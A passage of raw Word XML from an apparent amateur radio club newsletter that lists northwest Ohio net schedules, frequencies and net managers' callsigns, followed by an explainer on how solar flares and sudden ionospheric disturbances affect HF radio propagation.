              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>NWOHARES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="051E6BFA" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>6:30 PM DAILY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2445" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7B20FF07" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>146.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3BE4AC00" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>N8TNV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="17F99562" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02E5BE2E" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> TCTTN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42BDA215" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">9 PM Sun, Tues, Fri </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2445" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7FFFE262" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">147.015 </w:t>
            </w:r>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:color w:val="FF0000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="169CC9E2" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">  WB8YYS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="4034DD84" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5CE47F81" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>TATN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2715" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44FC6CD4" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>8:00 PM DAILY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2445" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="22E7C940" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>146.670  PL 123.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2020" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="312053A0" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>WG8Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4722FA3A" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E664C7" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">On the 15TH of  the month North West Ohio ARES Traffic Net meets on the alternate frequency of 146.94. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>This net time and frequency change has been reported to me by  N8TNV the net managers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B4FABC" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3203F356" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Have you tried to checking into or listen to the 6:45 (Now 6PM) Ohio Single Sideband Net (OSSBN) and heard nothing?  I can guarantee the net was there but you just couldn't hear it or maybe you heard one or two weak stations and not the net control. Well, it was not you radio that was at fault.  Since the time change from Daylight Savings to Eastern time things have changed. The sun is responsible for these poor conditions.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9AF971" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40603DAA" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>First, let me state that the interactions between the Sun and our Earth are incredibly complex. Even scientists who have studied the subject for years do not completely understand everything that happens on the Sun. I will try to give you some general background information about how the Sun affects radio propagation here on Earth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A85E3" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>It seems that higher sunspot numbers generally indicate a greater probability of good propagation at higher frequencies.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>HF propagation is done through bouncing signals off of charged particles in the earth's atmosphere. High sunspot numbers indicate higher activity in the sun, which shoots off energy into the earth's atmosphere, charging more particles that increases the amount of reflected power on the atmosphere, increasing received signal. So what's up?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455F3B38" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716FA071" w14:textId="1C4BC91C" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>RADIO WAVE PROPAGATION</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:noProof/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="253001728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C3438E4" wp14:editId="2863EB6F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4653915" cy="3063240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="17" name="Picture 1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Diagram&#10;&#10;Description automatically generated"/>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653915" cy="306324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626B0BBB" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">When the sun releases solar flares a large amount of energy and radiation are released. RF energy, including ultraviolet and x-ray radiation, travels out from the sun at the speed of light. It takes about 8 minutes for this radiation to reach the earth. These large bursts of radiated energy cause the sudden increase of ionization in the ionospheric layers of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>earths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> atmosphere. These are known as Sudden Ionospheric Disturbances. During daylight hours, this can really change the way transmitted radio signals are received. It can be wonderful for distant communications using the upper F layers of the atmosphere, where the layer is excited and can better support longer angle signals. However on the lower regions of the atmosphere, especially that "Daylight Dud" D-layer, this ionization causes greater absorption and disruption of radio signals more than those on higher frequencies.  This could explain why suddenly short range communications (Ohio to Ohio stations) is nearly impossible but stations in Florida and Iowa offer their services to relay for station in Ohio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FADE85D" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240" w:after="120"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Solar Flares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB8130D" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Solar flares are cataclysmic eruptions that suddenly release huge amounts of energy, including sustained, high-energy bursts of radiation from VLF to X-ray frequencies and vast amounts of solar material. Most solar flares occur around the peak of the 11-year solar cycle. The first earthly indication of a huge flare is often a visible brightness near a sunspot group, along with increases in UV and X-ray radiation and VHF radio noise. If the geometry between the Sun and Earth is right, intense X-ray radiation takes eight minutes to travel the 93 million miles to Earth at the speed of light.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BF9656" w14:textId="55CFDD55" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:noProof/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="253002752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A774358" wp14:editId="12D6CF00">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>76200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5707380" cy="4281170"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5080"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="16" name="Picture 16" descr="A picture containing arthropod, orange, d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arthropod, orange, dark&#10;&#10;Description automatically generated"/>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07380" cy="428117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75F75F6B" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>SOLAR FLAIR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E148794" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">The sudden increase in X-ray energy from a large flare can immediately increase RF absorption in the Earth's lowest ionospheric layers, sometimes causing a phenomenon known as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:i/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Sudden Ionospheric Disturbance</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SID). An SID affects all HF communication on the sunlit side of the Earth and signals in the 2 to 30-MHz range may disappear entirely. Even background noise may cease in extreme cases. When you experience a big SID, your first inclination may be to look outside to see if your antenna fell down! SIDs may last up to an hour before ionospheric conditions temporarily return to normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A20E68" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
